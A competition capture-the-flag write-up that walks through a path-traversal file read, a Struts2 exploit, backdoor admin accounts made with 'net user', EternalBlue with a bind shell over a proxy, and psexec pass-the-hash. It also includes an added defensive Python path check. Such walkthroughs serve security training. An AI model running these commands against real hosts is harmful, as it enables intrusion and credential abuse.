Shanghai College Student Cybersecurity Competition and "Panshi Action" 2025 (Vulnerability Discovery) Writeup

Posted by which 28 days ago, 168 views


A Bloodbath Caused by an Information Leak

Arbitrary file read; the path is base64-encoded:

..\..\..\..\Users\Administrator\Desktop\flag

Li5cLi5cLi5cLi5cVXNlcnNcQWRtaW5pc3RyYXRvclxEZXNrdG9wXGZsYWc
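The server-side check that would have refused the request above, as an added example (not code from the original writeup or from the challenge application). It assumes the endpoint takes a base64-encoded relative path and serves files from a hypothetical root `C:\app\files`; the function names are illustrative.

```python
import base64
import ntpath  # Windows path rules, usable on any OS

BASE_DIR = r"C:\app\files"  # assumed download root (hypothetical)

# The encoded value shown in the writeup (its '=' padding is stripped).
PAGE_VALUE = "Li5cLi5cLi5cLi5cVXNlcnNcQWRtaW5pc3RyYXRvclxEZXNrdG9wXGZsYWc"


def decode_param(value: str) -> str:
    """Decode a standard or URL-safe base64 parameter, tolerating missing padding."""
    padded = value + "=" * (-len(value) % 4)
    padded = padded.replace("-", "+").replace("_", "/")
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8")
    except ValueError as exc:  # covers binascii.Error and UnicodeDecodeError
        raise ValueError("parameter is not valid base64 text") from exc


def resolve_safe(param: str, base_dir: str = BASE_DIR) -> str:
    """Return the normalized path the request may read, or raise ValueError."""
    rel = decode_param(param)
    # Reject NUL bytes and anything carrying its own drive or UNC prefix.
    if "\x00" in rel or ntpath.splitdrive(rel)[0]:
        raise ValueError("drive and UNC prefixes are rejected")
    base = ntpath.normcase(ntpath.normpath(base_dir))
    # Validate AFTER decoding and normalizing, so "..\" and "../" both collapse.
    candidate = ntpath.normcase(ntpath.normpath(ntpath.join(base, rel)))
    # Containment check: also catches rooted paths such as "\Windows\win.ini".
    if ntpath.commonpath([base, candidate]) != base:
        raise ValueError("path escapes the download root")
    return candidate


if __name__ == "__main__":
    try:
        resolve_safe(PAGE_VALUE)
    except ValueError as err:
        print("blocked:", decode_param(PAGE_VALUE), "->", err)
```

The check runs on the decoded, normalized path; filtering the raw parameter for `..` would miss it because the traversal only exists after base64 decoding.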

The First Ray of Morning Sunlight

Layer 1

Directory scanning

The site runs on the Struts2 framework; exploit it with s46

flag{8nmMOYCDTIyN3EbHSjoeK0FgduXVwGr1}

Layer 2

Add a user for remote login

net user which admin@123 /add

net localgroup "Remote Desktop Users" which /add

net localgroup administrators which /add

Running fscan on the target machine 192.168.99.120 found EternalBlue

# Generate the payload
msfvenom -p windows/x64/shell_bind_tcp LPORT=4444 -f raw -o shellcode.bin
setg Proxies socks5:156.238.233.63:4445
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.99.112
set PAYLOAD windows/x64/shell_bind_tcp
set LPORT 4444
exploit 

proxychains4 nc 192.168.99.112 4444 

Layer 3

Add a user

net user which admin@123 /add

net localgroup "Remote Desktop Users" which /add

net localgroup administrators which /add

Administrator 173964ad89f81721613e41bd1122e65f
proxychains python3 /usr/share/doc/python3-impacket/examples/psexec.py  WORKGROUP/Administrator@10.223.155.223 -hashes :173964ad89f81721613e41bd1122e65f